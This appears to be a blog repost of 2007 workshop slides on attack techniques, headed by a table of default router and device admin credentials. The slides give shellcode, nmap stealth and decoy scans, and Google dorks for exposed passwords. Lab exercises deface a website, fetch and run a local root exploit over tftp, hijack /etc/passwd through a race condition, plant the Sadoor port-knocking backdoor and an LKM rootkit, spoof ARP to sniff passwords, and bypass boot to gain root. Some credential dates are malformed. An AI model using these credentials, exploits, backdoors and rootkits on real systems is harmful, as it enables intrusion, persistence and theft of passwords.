dlink adsl HTTP admin admin Admin 2006-01-21 2006-01-21
draytek Vigor3300 series Telnet draytek 1234 Admin 2006-09-27 2006-09-27
edimax wireless adsl router AR-7024 Multi admin epicrouter Admin 2006-04-10 2006-04-10
ericsson md110 pabx up-to-bc9 Multi (none) help varies depending on config minimal list access by default No 2002-1-10 2005-13-7
ericsson ericsson acc Multi n/a (none) Admin No 2002-1-10 2005-13-7
giga 8ippro1000 Multi Administrator admin Admin 2006-00-25 2006-00-25
hp sa7200 Multi admin admin Admin No 2002-1-10 2005-13-7
hp sa7200 Multi admin (none) Admin No 2002-1-10 2005-13-7
hp 2300 Multi admin admin Admin 2006-10-06 2006-10-06
iPSTAR iPSTAR Satellite Router/Radio v2 HTTP admin operator Admin For CSLoxInfo and iPSTAR Customers No 2004-23-3 2005-13-7
iPSTAR iPSTAR Network Box v.2+ HTTP admin operator Admin iPSTAR Network Box is used by the CSLoxInfo Broadband Satellite system. No 2004-26-5 2005-13-7
iblitzz BWA711/All Models All HTTP admin admin Admin This Information Works On All Models Of The Blitzz Line 2005-09-06 2005-09-06
ibm a20m Multi n/a admin Admin No 2002-1-10 2005-13-7
ihoi oihoh lknlkn HTTP Administrator pilou Admin 2006-03-05 2006-03-05
inchon inchon inchon Multi admin admin Admin inchon 2005-06-15 2005-06-15
intel netstructure 480t Telnet admin (none) Admin No 2002-1-10 2005-13-7
intex organizer Multi n/a (none) Admin No 2002-1-10 2005-13-7
ion nelu nel Multi n/a admin Admin vreau ceva 2006-03-15 2006-03-15
ion nelu nel Multi Administrator admin Admin vreau ceva 2006-03-15 2006-03-15
latis network border guard Multi n/a (none) Admin No 2004-10-10 2005-13-7
linksys ap 1120 Multi n/a (none) Admin No 2005-13-2 2005-13-7
longshine isscfg HTTP admin 0 Admin No 2004-21-11 2005-13-7
maxdata ms2137 Multi n/a (none) Admin No 2005-28-4 2005-13-7
mediatrix 2102 mediatrix 2102 HTTP admin 1234 Admin 2006-07-05 2006-07-05
medion Routers HTTP n/a medion Admin No 2004-21-11 2005-13-7
microRouter 900i Console/Multi n/a letmein Admin No 2002-1-10 2005-13-7
motorola vanguard Multi n/a (none) Admin No 2003-1-11 2005-13-7
mro software maximo v4.1 Multi SYSADM sysadm Admin No 2002-1-10 2005-13-7
netgear FM114P Multi n/a (none) Admin No 2004-18-7 2005-13-7
netgear sc101 management software admin password Admin 2006-09-05 2006-09-05
netgear DG834GT 192.168.0.1 Multi admin Password Admin 2006-09-28 2006-09-28
netscreen firewall Telnet Administrator (none) Admin No 2002-1-10 2005-13-7
netscreen firewall Telnet admin (none) Admin No 2002-1-10 2005-13-7
netscreen firewall Telnet operator (none) Admin No 2002-1-10 2005-13-7
netscreen firewall HTTP Administrator (none) Admin No 2002-1-10 2005-13-7
nortel dms Multi n/a (none) Admin No 2003-8-4 2005-13-7
nortel p8600 Multi n/a (none) Admin No 2005-23-2 2005-13-7
olitec sx 200 adsl modem router Multi admin adslolitec Admin default ip 192.168.0.250 No 2003-25-9 2005-13-7
olitec (Trendchip) sx 202 adsl modem router HTTP admin admin Admin Firmware: 2.7.0.9(UE0.B1C)3.3.0.23 2006-03-25 2006-03-25
ovislink WL-1120AP Multi root (none) Admin 2006-02-05 2006-02-05
panasonic cf 27 4 Multi n/a (none) Admin No 2004-6-7 2005-13-7
penril datability vcp300 terminal server Multi n/a system Admin No 2002-1-10 2005-13-7
planet Akcess Point HTTP admin admin Admin No 2004-6-2 2005-13-7
planet akcess point HTTP admin admin Admin 2006-09-17 2006-09-17
sagem fast 1400w Multi root 1234 Admin No 2005-01-30 2005-13-7
samsung n620 Multi n/a (none) Admin No 2002-1-10 2005-13-7
samsung modem/router aht-e300 Multi admin password Admin after reset 2006-07-02 2006-07-02
sharp AR-407/S402 Multi n/a (none) Admin No 2003-17-11 2005-13-7
siemens hipath Multi n/a (none) Admin No 2002-1-10 2005-13-7
silex technology PRICOM (Printserver) Multi root (none) Admin for telnet / HTTP No 2005-9-1 2005-13-7
sitara qosworks Console root (none) Admin No 2003-11-5 2005-13-7
smc smc 7904BRA Multi (none) smcadmin Admin 2006-07-09 2006-07-09
telindus telindus 2002 Telnet admin admin Admin 2005-11-02 2005-11-02
topsec firewall Multi superman talent Admin 2006-07-21 2006-07-21
us robotic adsl gateway wireless router wireless router support support super user access I find it on a manual 2005-11-08 2005-11-08
us21100060 hp omibook 6100 Multi n/a (none) Admin No 2004-18-5 2005-13-7
westell 2200 Multi admin password Admin No 2004-10-10 2005-13-7
wline w3000g HTTP admin 1234 Admin 2006-09-31 2006-09-31
xd xdd xddd Multi xd xd Admin No 2004-14-10 2005-13-7
xerox xerox Multi admin admin Admin No 2004-23-2 2005-13-7
xerox xerox Multi n/a admin Admin No 2004-23-2 2005-13-7
xerox work centre pro 35 HTTP admin 1111 Admin No 2005-27-4 2005-13-7
xyplex switch 3.2 Console n/a (none) Admin No 2002-1-10 2005-13-7

Posted in All about cracking $ hacking | Leave a Comment »

Hacking Techniques page 2

December 8, 2007

Gaining Access
– Buffer Overflow –
➤ Stack Based Buffer Overflows
➤ Off-by-One Overflows
➤ Frame Pointer Overwrites
➤ BSS Overflows
➤ Heap Overflows
01./02.02.2007 linuxdays.lu 2007 44
Gaining Access
– Stack Based Buffer Overflow –
➤ C/C++ problem
➤ programming error
➤ Copy to much variable user input into fixed sized buffer
#include <stdio.h>
int main()
{
char name[31];
printf("Please type your name: ");
gets(name);
printf("Hello, %s", name);
return 0;
}
Buffer overflow occur if you enter
`1234567890123456789012345678901234567890`
01./02.02.2007 linuxdays.lu 2007 45
Gaining Access
– Stack Based Buffer Overflow –
Exploitation:
– Missing bounds checking
– Mutiple „unsafe“ functions in libc
– Executing code in the data/stack segment
– Creating the to be feed to the application
Memory layout of a process:
Code
Data
Stack high address
low address
no ‘execution’ attribute set
‘read-only’ attribute
LIFO – top of the stack
BSS
Heap
01./02.02.2007 linuxdays.lu 2007 46
Gaining Access
– Stack Based Buffer Overflow –
– Stack holding all the information for the function
– Stack is created at the beginning of a function
– Stack is released at the end of a function
– LIFO mechanism to pass arguments to
functions and to reference local variables
void
function (void)
{
[ ... ]
}
int
main (void)
{
int a;
function (argv[1])
[ ... ]
}
Stack
Frame 1
Frame 2 EBP
ESP
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
POP
PUSH
- function parameters
- local variables
- data to recover previous frame
01./02.02.2007 linuxdays.lu 2007 47
Gaining Access
– Stack Based Buffer Overflow –
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
function ()
Frame 2
main ()
Frame 1
Return Address
1
2
3
SFP
4
local variables
buff[512]
args
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
SFP
saved registers
local variables
ESP
saved registers
args
EBP
EIP
Return Address EIP
01./02.02.2007 linuxdays.lu 2007 48
Gaining Access
– Stack Based Buffer Overflow –
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
1
2
3
4
buff[512]
5
Wrong Return
SFP
args
EBP
saved registers
local variables
saved registers
args
function ()
Frame 2
main ()
Frame 1
Return Address
01./02.02.2007 linuxdays.lu 2007 49
Gaining Access
– Stack Based Buffer Overflow –
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
1
2
3
456
Stack
buff[512]
SFP
args
EBP
saved registers
local variables
saved registers
args
function ()
Frame 2
main ()
Frame 1
Wrong Return
Return Address
01./02.02.2007 linuxdays.lu 2007 50
Gaining Access
– Stack Based Buffer Overflow –
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
0x0A00
1
2
3
456
0×0800
0x0A00
shellcode 0x0C00
shellcode
nop
nop
0x0A00
0x0A00
function () 0x0A00
Frame 2
main ()
Frame 1
01./02.02.2007 linuxdays.lu 2007 51
Gaining Access
– Shellcode –
char linux_ia32_shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%a1 */
"\xcd\x80" /* int $0×80 */
Old school payload: bindshell, backconnect
01./02.02.2007 linuxdays.lu 2007 52
Gaining Access
– Exercise: Web Site defacement –
$ cd /home/hamm/ssl/
$ ls –la
$ ./openSSL 0×73 192.168.22.21 443 –c 40
/usr/bin/whoami
echo "hacked by me….. " > /var/www/html/index.html
- Unprivileged user -> local user privileges escalation
01./02.02.2007 linuxdays.lu 2007 53
Gaining Access
– Exercise: Web Site defacement –
What do we see on the Firewall???
01./02.02.2007 linuxdays.lu 2007 54
Gaining Access
primary target webserver
– why they are so vulnerable –
➤complex application
➤multiple subsystems:
application server, scripts, sql-server
➤self made applications:
programmers don’t know how to write secure code
➤Shell-Command-Injection:
bypass commands through the shell
Input: "Alice; rm – rf"
➤SQL-Injection
bypass SQL Commands by User input
Input: "User=Alice' -&Pass=Idontknow"
01./02.02.2007 linuxdays.lu 2007 55
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 56
Maintaining Access
– be silent –
➤after a successful initial attack
➤ hide the tracks from logfiles
➤ expand local rights; find vulnerabilities in network
➤ install rootkits, steal password database, start
network sniffer
➤ try same password on other systems
➤ find problems in topology (ex. dual homed hosts)
➤ try to attack the private network
01./02.02.2007 linuxdays.lu 2007 57
Maintaining Access
Privileges Escalation
– Race Condition –
what could I try to attack?
- SUID / SGID binaries
find / -perm –4000 –type f –user root –print
find / -perm –2000 –type f –group root –print
- privileged process
- Kernel
- password file
Source of problems?
- configuration error
- local software vulnerabilities
– buffer overflow
– race condition
– format string
01./02.02.2007 linuxdays.lu 2007 58
Maintaining Access
Privileges Escalation
– example: race_bug –
#include <stdio.h>
#include <unistd.h>
int
main (int argc, char *argv[])
{
char path[] = "/tmp/race.txt"
FILE *fp;
fp = fopen (path, "a+");
fprintf (fp, "%s\n", argv[1]);
fclose (fp);
unlink (path);
return 0;
}
01./02.02.2007 linuxdays.lu 2007 59
Maintaining Access
Privileges Escalation
– example: race_bug –
Prepare attack
$ cd /home/hamm/race
$ ls –la
$ ./race_bug test
$ ls –la /tmp
$ cat /etc/passwd
$ su -; cp /etc/passwd /etc/passwd.bak; exit
Attak:
$ ln –s /etc/passwd /tmp/race.txt
$ ls –la /tmp
$ cat command
$ ./command
$ ls –la /tmp
$ cat /etc/passwd
$ su – bimbam
# id
01./02.02.2007 linuxdays.lu 2007 60
Maintaining Access
Privileges Escalation
– Exercise: privileges escalation –
$ su –
# cd /home/hamm/ssl/
# ls –la
# cp p /tftpboot
# /etc/init.d/atftpd start
# exit
$ ./openSSL 0×73 192.168.22.21 443 –c 40
/usr/bin/whoami
pwd
/usr/bin/tftp 192.168.22.1
mode binary # local root exploit
get p # kernel 2.2.x 2.4.x
quit
ls –l
chmod +x p
ls –l
./p
whoami
01./02.02.2007 linuxdays.lu 2007 61
Maintaining Access
Port Knocking
– introduction –
Aka Port Knocking Back Door
- Open Port?????
- no promisc mode, no open ports
- raw sockets
- trigger for special packets to get activated
- attacker:
– send trigger pkg1
– send trigger pkg2
– send trigger pkg3
– send command pkg1
- example: Sadoor
http://cmn.listptojects.darklab.org
Port 80, 443 open; statefull
01./02.02.2007 linuxdays.lu 2007 62
Maintaining Access
Port Knocking
– Sadoor example –
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 1
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
icmp {
type = 8;
}
}
}
# key 2
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
flags = SYN;
dport = 80;
sport = 3456;
}
}
}
01./02.02.2007 linuxdays.lu 2007 63
Maintaining Access
Port Knocking
– Sadoor example –
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 3
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
udp {
dport = 111;
data { bim\x20bam }
}
}
}
# command
cmdpkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
sport = 80;
sport = 12345;
}
}
}
01./02.02.2007 linuxdays.lu 2007 64
Maintaining Access
Port Knocking
– Sadoor example –
Create a config-image database
and download it to /home/hamm/.sash
mksadb
mv sadoor.db /var/www/html/
chmod 644 /var/www/html/sadoor.db
Run the daemon
/usr/sbin/sadoor
Review logging
tail –f /etc/sadoor/sadoor.log
01./02.02.2007 linuxdays.lu 2007 65
Maintaining Access
Port Knocking
– Sadoor example –
ON CLIENT side:
1. Download http://testwww.mumm.lu/sadoor.db
2. become root
cd
cd .sash
mv /home/hamm/sadoor.db .
sadbcat sadoor.db sash.db # create encrypted db
rm –f sadoor.db # delete plain sequence
3. Sending commands
sash 192.168.22.24 \
–vv –r "cat /etc/passwd > /var/www/html/test.txt"
sash 192.168.22.24 "chmod 644 /var/www/html/test.txt"
4. Establish a connection / remote shell
sash 192.168.22.24 –vv
sh-2.05b# whoami
sh-2.05b# /sbin/ifconfig
sh-2.05b# exit
01./02.02.2007 linuxdays.lu 2007 66
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 67
Clearing Tracks
Rootkits
– introduction –
Main goals of a rootkit:
- hide activities of an attacker to the legal administrator
– active processes
– directories & files
– network activities
- provide a backdoor to the system
- let the attacker become root whenever he want
- collect sensitive data
– from network
– from user input
01./02.02.2007 linuxdays.lu 2007 68
Clearing Tracks
Rootkits
– introduction –
1th generation: Binary Rootkits
- replace important system tools by modified versions:
– du(1), locate(1), netstat(1), ps(1), top(1),
– ifconfig(1), w(1), who(1), …..
- defined parameters will become invisible in the future:
– IP Addresses
– directories & files
– usernames
- easy to discover:
– by filesystem inegrity checker: — tripwire, — aide
- examples: Irk3-6, (Linux), Fbrk (FreeBSD), Solaris Rootkit
01./02.02.2007 linuxdays.lu 2007 69
Clearing Tracks
Rootkits
– introduction –
2th generation: LKM (Loadable Kernel Modules) Rootkits
- expand the functionality of the kernel
- can be loaded dynamically: insmod(3), rmmod(3)
- implemented as device driver
-> high level of flexibility
- implementations:
– new modules
– infecting existing modules
- result: trojaned kernel à full control over all userland apps.
01./02.02.2007 linuxdays.lu 2007 70
Clearing Tracks
Rootkits
– introduction –
2th generation: LKM (Loadable Kernel Modules) Rootkits
- syscalls: a gate between userland and kernel
- example for syscalls: trace /bin/ls
execve(…
uname(…
brk(0)
old_mmap(…
access(…
open(…
open(…
……
01./02.02.2007 linuxdays.lu 2007 71
Clearing Tracks
Rootkits
– introduction –
2th generation: LKM (Loadable Kernel Modules) Rootkits
- normal syscall:
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Exec syscall
example: mkdir
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
01./02.02.2007 linuxdays.lu 2007 72
Clearing Tracks
Rootkits
– introduction –
2th generation: LKM (Loadable Kernel Modules) Rootkits
- manipulated syscall:
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Exec syscall
example: mkdir
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
Exec syscall
manipluated: mkdir
01./02.02.2007 linuxdays.lu 2007 73
Clearing Tracks
Rootkits
– introduction –
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit
#define MODULE /* the new mkdir syscall */
#define __KERNEL__ int hack_mkdir (const char *path) {
printk ("BimBam!\n");
#include <linux/module.h> return 0;
#include <linux/version.h> }
#include <linux/kernel.h>
#include <sys/syscall.h> int init_module (void) {
#include <stdio.h> orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hack_mkdir;
MODULE_LICENSE("GPL"); return 0;
}
/* import syscall table */
extern void *sys_call_table[]; void cleanup_module (void) {
sys_call_table[SYS_mkdir]=hack_mkdir;
/* dummy for old mkdir syscall */ }
int (*orig_mkdir) (const char *path);
01./02.02.2007 linuxdays.lu 2007 74
Clearing Tracks
Rootkits
– introduction –
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit
cd /root/rootkit/mkdir
gcc –c –I /usr/src/linux/include mkdir.c
insmod mkdir.o
lsmod
mkdir test
ls –la
cat /var/log/messages
rmmod mkdir
lsmod
mkdir test
ls –la
Clearing Tracks
Root kits
– introduction –
2th generation: LKM Rootkit: Adore
cd /root/rootkit/adore/
insmod adore.o
lsmod
insmod cleaner.o
lsmod
rmmod cleaner
lsmod
ps aux | grep ssh
./ava i <PID SSHD>
ps aux | grep ssh
netstat –punta | grep 22
mkdir /root/rootkit/bimbam
./ava h /root/rootkit/bimbam
ls –la /root/rootkit
./ava –U dummy
01./02.02.2007 linuxdays.lu 2007 76
Clearing Tracks
Rootkits
– introduction –
3th generation: (Virtual File System) VFS Layer Rootkit
- sys_call_table is not exported anymore
– Red Hat 8.0 (Kernel 2.4.18)
– Kernel 2.5.41 à
- all Syscalls which access the Filesystem make use of
the Virtual File System
- in Unix, most of all is handled like a file
- existing Handler-Routines are replaced by modified one
à files/folder could be hidden
à via /proc hidding of processes
01./02.02.2007 linuxdays.lu 2007 77
Clearing Tracks
Rootkits
– introduction –
3th generation: (Virtual File System) VFS Layer Rootkit
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
ext2/ ext3/ …
VFS
Syscall
01./02.02.2007 linuxdays.lu 2007 78
Hacking Techniques
Insider Attacks
01./02.02.2007 linuxdays.lu 2007 79
Insider Attacks
– Password Sniffing true a Switch –
Default Gateway
IP: 10.10.10.1
MAC: 11:11:11:11:11:11
IP: 10.10.10.99
MAC: 99:99:99:99:99:99
Attacked PC
IP: 10.10.10.2
MAC: 22:22:22:22:22:22
ARP Reply IP 10.10.10.1 MAC 99:99:99:99:99:99
No gratuitous ARP, BUT directed ARP:
ETHERNET II
Dst: 22:22:22:22:22:22
SRC: 99:99:99:99:99:99
ARP reply:
Sender IP addr: 10.10.10.1
Sender MAC addr: 99:99:99:99:99:99
01./02.02.2007 linuxdays.lu 2007 80
Insider Attacks
– Password Sniffing true a Switch –
Telnet Client:
IP: 192.168.3.3
IP: ___.___.___.___
Telnet Server:
IP: 192.168.3.4
IP: ___.___.___.___
Exercise:
1. echo 1 > /proc/sys/net/ipv4/ip_forward
2. arpspoof –i eth0 –t 192.168.4.30 192.168.4.28
3. dsniff -cn
Attacker:
IP: 192.168.3.2
MAC: 00:08:74:B3:BB:F1
IP: ___.___.___.___
MAC: __:__:__:__:__:__
01./02.02.2007 linuxdays.lu 2007 81
Insider Attacks
SSH MitM Attack
– by DNS Spoofing –
SSH Server:
IP: 192.168.3.3
DNS Server:
IP: 158.64.4.
Default Gateway:
IP: 192.168.3.1
Attacker:
IP: 192.168.3.2
Target: SSH Client:
IP: 192.168.3.xx
DNS Response (server_xyz.lu, 192.168.3.2)
DNS Query (HOST: server_xyz.lu)
01./02.02.2007 linuxdays.lu 2007 82
Insider Attacks
SSH MitM Attack
– by DNS Spoofing –
01./02.02.2007 linuxdays.lu 2007 83
Insider Attacks
SSH MitM Attack
– by DNS Spoofing –
SSH Server:
IP: 192.168.3.3
DNS Server:
IP: 158.64.4.
Default Gateway:
IP: 192.168.3.1
Attacker:
IP: 192.168.3.2
Target: SSH Client:
IP: 192.168.3.xx
01./02.02.2007 linuxdays.lu 2007 84
Hacking for Admins
by

{Cypronmaya}

Posted in All about cracking $ hacking | Leave a Comment »

Hacking Techniques

December 8, 2007

Hacking Techniques
Attackers
Hackers
Spies
Terrorists
Insider
Prof. Crimminaly
Vandals
Objectives
Challange, Status
Political Gain
Financial Gain
Damage
01./02.02.2007 linuxdays.lu 2007 4
Hacking Techniques
Script Kiddies
Hackers
Geek
Stupid Users
Automated Scripts / Viruses / Botnet / Spam
01./02.02.2007 linuxdays.lu 2007 5
Hacking Techniques
- High profile targets:
– Banks
– Military
– Universities
– Telecom / internet Provide
–Private PC’s / Enduser
– Botnet
– Spam
– Homebanking Data
01./02.02.2007 linuxdays.lu 2007 6
Hacking Techniques
Most often Security problems:
(Source: CSI/FBI Computer Crime and Security Survey)
Virus
Insider
theft Laptop
Deial of Service
Unauthorised
WLAN
Hacking
01./02.02.2007 linuxdays.lu 2007 7
Hacking Techniques
➤Network based System Hacking
➤Web Server Hacking
➤Physically enter the Target Building
➤WLAN (Wireless LAN) Hacking
➤War Dialling
➤Sniffing
➤Social Engineering
➤Viruses
01./02.02.2007 linuxdays.lu 2007 8
Exercise:
– physical access = root rights –
1. Interupt the bootloader by pressing >> e <<
2. Select the kernel line and press >> e <<
3. add >> init=/bin/bash << to the kernel line
4. kernel /vmlinuz-2.6.8 root=/dev/hda4 ro init=/bin/bash
5. Press >> Enter <<
6. Press >> b << to boot
7. mount –o remount,rw /dev/hda4
8. passwd hamm ( password: test123)
9. passwd (password: test123)
10.sync
11.mount –o remount,ro /dev/hda4
12.shutdown –rn now
13.Login as user hamm & launch vmware; start all VM from top down
01./02.02.2007 linuxdays.lu 2007 9
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 10
Footprinting
– Information Gathering –
➤ visit targets’ websites
➤ review HTML Code, JavaScript and Comments & robots.txt
➤ search for passwords, hidden directories, contact names
➤ Dumpster Diving
Quotation Bill Gates in: Susan Lammers; Programmers at Work
Tempus Books; Reissue Edition, 1989
„No, the best way to prepare is to write programs, and to study
great programs that other people have written. In my case, I went
to the garbage cans at the Computer Science Centre and I fished
out listings of their operating system.“
01./02.02.2007 linuxdays.lu 2007 11
Footprinting
– Information Gathering –
➤ whois request at the Network Information Centre
– receive information about IP address ranges
– Names and EMail addresses of responsibles
whois -h whois.dns.lu linuxdays.lu
domainname: linuxdays.lu
nserver: arthur.tudor.lu
nserver: dorado.tudor.lu
org-name: Centre de Recherche Public Henri Tudor
adm-email: pierre.plumer@crpht.lu
tec-name: Xavier Detro
tec-email: xavier.detro@tudor.lu
Important whois domains:
- RIPE (Europe & N-Africa) – APNIC (Asia Pacific)
- ARIN (N-America & S-Africa) – LACNIC (Latin America)
01./02.02.2007 linuxdays.lu 2007 12
Footprinting
– Exercise Information Gathering –
➤ DNS Lookup
– use nslookup tools to receive informations about DNS-
& EMAIL Server, looking for names like Oracle, TestLinux, ….
– try a zone transfer
➤ Footprinting by DNS: nslookup(1); host(1); dig(1);
# nslookup
> server 192.168.22.22
> www.mumm.lu
> set type=mx
> mumm.lu
> set type=any
> mumm.lu
> ls –d mumm.lu # try zone transfer
> exit
# dig @192.168.22.22 mumm.lu axfr # Zonetransfer
01./02.02.2007 linuxdays.lu 2007 13
Footprinting
– Information Gathering –
➤whois tools:
– Sam Spade www.samspade.org
– Smart Whois www.tamos.com
– Netscan www.netscantools.com
– GTWhois www.geektools.com
– http://www.all-nettools.com/toolbox
➤DNS must reads:
– RFC 1912 Common DNS Errors
– RFC 2182 Secondary DNS Servers
– RFC 2219 Use of DNS Aliases
01./02.02.2007 linuxdays.lu 2007 14
Footprinting
– Information Gathering –
➤ footprinting @ google
➤ news group articles of employees @<targetdomain>
➤ search business partners link:<targetdomain>
➤ site:<targetdomain> intitle:index.of
➤ site:<targetdomain> error | warning
➤ site:<targetdomain> login | logon
➤ site:<targetdomain> username | userid
➤ site:<targetdomain> password
➤ site:<targetdomain> admin | administrator
➤ site:<targetdomain> inurl:backup | inurl:bak
➤ site:<targetdomain> intranet
01./02.02.2007 linuxdays.lu 2007 15
Google Hacking
– Introduction –
The Beginnings:
www.theregister.co.uk/2001/11/28/the_google_attack_engine/
Link points to a Switch of a .gov Network
Google not 'hackers' best friend‘ — ww.vnunet.com/News/1127162
Index.of +banques +filetype:xls
Johnny (I hack stuff) Long
‘Google Hacking for Penetration Testers’
Google Hacking Database http://johnny.ihackstuff.com
12.03.2006 Chicago Tribune
http://www.heise.de/newsticker/meldung/70752
2600 CIA Agents discovered via Search Engine
01./02.02.2007 linuxdays.lu 2007 16
Google Hacking
– Introduction –
What to know:
Advanced Operands:
site:<domainname>
inurl:<path>
filetype:<xls|doc|pdf|mdb|ppt|rtf|…….>
intitle:<keyword>
intext:<keyword>
…… Google as an ‘
Anonymous Proxy’
Google Cache
&strip=1
01./02.02.2007 linuxdays.lu 2007 17
Google Hacking
– Introduction –
What to know:
The Power of combining Advanced Operands:
site:heise.de –site:www.heise.de
– shows all websites NOT from the official Webserver
– maps nre hostnames without contacting target network
– wap.heise.de, chat.heise.de, www.tb.heise.de, …
Offline Analysis of the search result:
– www.sensepost.com/research_misc.html
– SOAP Google API
01./02.02.2007 linuxdays.lu 2007 18
Google Hacking
– Introduction –
What to find:
The Google Hacking Database (johnny.ihackstuff.com):
– Directory Listings à Hidden/Private Files
intitle:index.of ‘parent directory’
intitle:index.of.admin
intitle:index.of inurl:admin
intitle:index.of ws_ftp.log
– Error Messages of Scripts
‘Fatal error: call to undefined function’
–reply –the –next
‘Warning: Failed opening’ include_path
– Search for vulnerable Scripts
inurl:guestbook/guestbooklist.asp
‘Post Date’ ‘From Country’
– Search for Backups
filetype:bak inurl:php.bak
filetype:bak inurl:php.bak
– Search for:
— Printers; — Webcams; — Intranet Sites;
— Network Tools Ntop, MRTG; — Databases
01./02.02.2007 linuxdays.lu 2007 19
Google Hacking
– Exercise –
Livecycle of a Google Hack:
1. Security Problem deicovered on online product;
2. Analyse online product
3. Find typical string
4. Create a google request
5. Find vulnerable websites
Examples:
– inurl:php.bak mysql_connect mysql_select_db
– ext:pwd inurl:(service | authors | administrators | users)
"# -FrontPage-“
– "index of/" "ws_ftp.ini" "parent directory“
– !Host=*.* intext:enc_UserPassword=* ext:pcf
– "admin account info" filetype:log
– enable password | secret "current configuration“
-intext:the
01./02.02.2007 linuxdays.lu 2007 20
Preparation
anonymity doesn’t exist
➤ break systems in different countries / time zones
➤ install network multipurpose tools like netcat or backdoors
➤ hop from host to host to get anonymity
01./02.02.2007 linuxdays.lu 2007 21
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 22
Scanning
– Goals –
➤ mapping of the target network
➤ use system tools like traceroute & ping
➤ Visual Tools: NeoTrace (Visual Trace) & Visual Route
➤ finding the range of IP addresses
➤ discerning the subnet mask
➤ identify network devices like firewalls & routers
➤ identify servers
➤ mapping of the reachable services
➤ detecting `live` hosts on target network
➤ discovering services / listening ports / portscan; nmap;
➤ identifying operating system & services
➤ identify application behind services & patch level
01./02.02.2007 linuxdays.lu 2007 23
Scanning
– Network Mapping –
Nmap: find living hosts
$ su –
# ns_mumm
# cat /etc/resolve.conf
# nmap –sL www.mumm.lu/27 # List Scan
(only do nslookup for the IP rage)
# nmap –-packet_trace –sP www.mumm.lu/27 # ICMP/TCP
(send ICMP Echo Request and ACK to Port 80
if RST is received à host is alive / unfiltered )
# nmap –n –P0 –sU –g 53 –p 53 –T polite www.mumm.lu/27
( UDP Scans are alomost NOT usefully; -g 53 = sourceport
-P0 = don’t PingScan first; -T polite = scan speed)
-sF, -sX, -sN, –sA, # not usable
FIN-, XMAS-, Null-, ACK- Scan # today
01./02.02.2007 linuxdays.lu 2007 24
Scanning
– Port Scanning –
Nmap: port scan (connect scan)
# nmap –n –sT –P0 –p 80 192.168.22.21,22,24
# nmap –n –sT –P0 –p 110 192.168.22.21,22,24
SYN
SYN/ACK
ACK
SYN
RST/ACK
RST/ACK
Port open
Port closed
01./02.02.2007 linuxdays.lu 2007 25
Scanning
– Port Scanning –
Nmap: port scan (stealth scan)
# nmap –n –sS –P0 –p 80 192.168.22.21,22,24
# nmap –n –sS –P0 –p 110 192.168.22.21,22,24
SYN
SYN/ACK
RST
SYN
RST/ACK
Port open
Port closed
01./02.02.2007 linuxdays.lu 2007 26
Scanning
– Port Scanning –
Nmap: port scan
# nmap –n –sT –P0 –p 20-25,80,443 192.168.22.21,22,24
# nmap –n –sS –P0 –p 20-25,80,443 192.168.22.21,22,24
Techniques to stay anonymous:
silent scan:
# nmap –n –sT –P0 –T sneaky –p 20-25,80 192.168.22.22
fragmentation scan
# nmap –n –P0 –f –p 20-25,80 192.168.22.22
decoy scan
# nmap –n -P0 –D 1.1.1.1,2.2.2.2,ME,3.3.3.3 –p 80 <host>
01./02.02.2007 linuxdays.lu 2007 27
Scanning
– Exercise –
Scan the MUMM.LU network:
01./02.02.2007 linuxdays.lu 2007 28
Advanced Scanning
– IP-ID Idle Scan –
Exercise: Who the hell is scanning you?
target perform:
# tcpdump –n –i eth0 host 192.168.4.<your IP Address>
attacker perform: (idle_scan)
01./02.02.2007 linuxdays.lu 2007 29
Advanced Scanning
– IP-ID Idle Scan –
- based on IP-ID prediction
- example with hping2 –SA –p 80 –c 5 <switch ip>
- all packets have Fragment-ID Number
- every new packet increases the IP ID Number
- by most systems IP ID + 1
- this is exploitable
- by monitoring the IP ID value of a host
- you know how many packets he sends
- this could be abused for zombie port scanning
01./02.02.2007 linuxdays.lu 2007 30
